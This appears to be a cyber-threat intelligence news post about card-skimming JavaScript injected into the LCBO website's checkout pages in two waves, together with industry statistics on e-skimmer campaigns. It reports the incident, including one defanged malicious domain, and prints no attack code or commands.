On 12 January, Canadian alcohol retail giant LCBO announced that an “unauthorized party embedded malicious code” onto its website in order to steal information from customers in the process of checking out. Over five days in January, they wrote, customers “may have had their information compromised.” In fact, the infection was one of several to target LCBO customers in the last month, including an attack that lasted for more than a week that the company has not publicly acknowledged.
Researchers said they found the first payment-skimming malware infection occurred on LCBO’s website on 28 December, and that it lasted until 4 January 2023. The second infection, acknowledged by LCBO in statements released last week, began on 5 January 2023 and lasted until 10 January.[1]
LCBO, which stands for Liquor Control Board of Ontario, is a government enterprise and now one of the largest retailers and wholesalers of alcoholic beverages in the world. It said last week that it was shutting down its website and app to investigate a “cybersecurity incident.”[2] Their 680 retail stores are still able to operate, according to a statement the following day. Third-party experts were hired to address the incident. “At this time, we can confirm that an unauthorized party embedded malicious code into our website that was designed to obtain customer information during the checkout process,” LCBO said, adding that customer information provided on their checkout pages may have been “compromised.” The information stolen included names, email and mailing addresses, membership account details, account passwords and credit card information. They urged customers who made purchases in that time period to check their credit card payments and report suspicious transactions.
Last week, an LCBO spokesperson said that they are continuing to investigate the situation and are identifying specific customers who were impacted so that they can communicate with them directly. The website and app are back up and running but all account passwords have been reset. The website has had an average of 3,058,000 monthly visits over the past three months, with 94% coming from within Canada and 3% coming from the US.
The hackers reportedly injected JavaScript into the website, allowing them to exfiltrate data stolen from the checkout page. Researchers said they have seen this form of hack in a variety of forms since August 2020. They have discovered five other e-commerce domains with infections that used the same malicious domain, lotilabs[.]org for either e-skimmer hosting or exfiltration.
RECORDED FUTURE EXPERTS USED A BROWSER’S DEVELOPER VIEW TO SHOW THE MALICIOUS LINE OF CODE EMBEDDED IN LCBO’S WEBSITE.
LCBO did not respond to requests for comment about whether their investigation included the first infection or whether customers from that first infection were also being notified alongside those from the second. Tanium said e-skimmer attacks have been around for years, yet many retailers still haven’t learned lessons from high-profile incidents involving Target and Ticketmaster; namely by starting to patch frequently. “Many business owners are simply using a service and do not have the technical expertise or resources to do that work,” they said. “From the consumer side it is always prudent to use cards that have fraud protection, use virtual cards where possible for web e-commerce, monitor purchases regularly (most financial institutions allow account activity to be sent via text).”
Recorded Future discovered 1,520 unique malicious domains involved in the infections of 9,290 unique e-commerce domains in 2022. Most involved campaigns that saw groups use fake payment card forms or taking over legitimate merchant web infrastructure to install e-skimmers. The company reported breaches that exposed customer payment card data at over 1,000 unique merchants in 2022. “For 77% of the merchants, we have identified compromised payment cards from the breaches on the dark web,” they said.
The e-skimmers led to 45.6 million compromised payment card records posted for sale on dark web platforms in 2022.[3]
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@wapacklabs.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www. redskyalliance. org/
- Website: https://www. wapacklabs. com/
- LinkedIn: https://www. linkedin. com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/5504229295967742989
[1] https://therecord.media/canadas-largest-alcohol-retailer-infected-with-card-skimming-malware-twice-since-december/
[2] https://www.lcbo.com/content/lcbo/en/corporate-pages/about/media-centre/news/2023-01-10.html
[3] https://therecord.media/59-4-million-compromised-payment-card-records-posted-for-sale-on-dark-web-in-2022-report/
Comments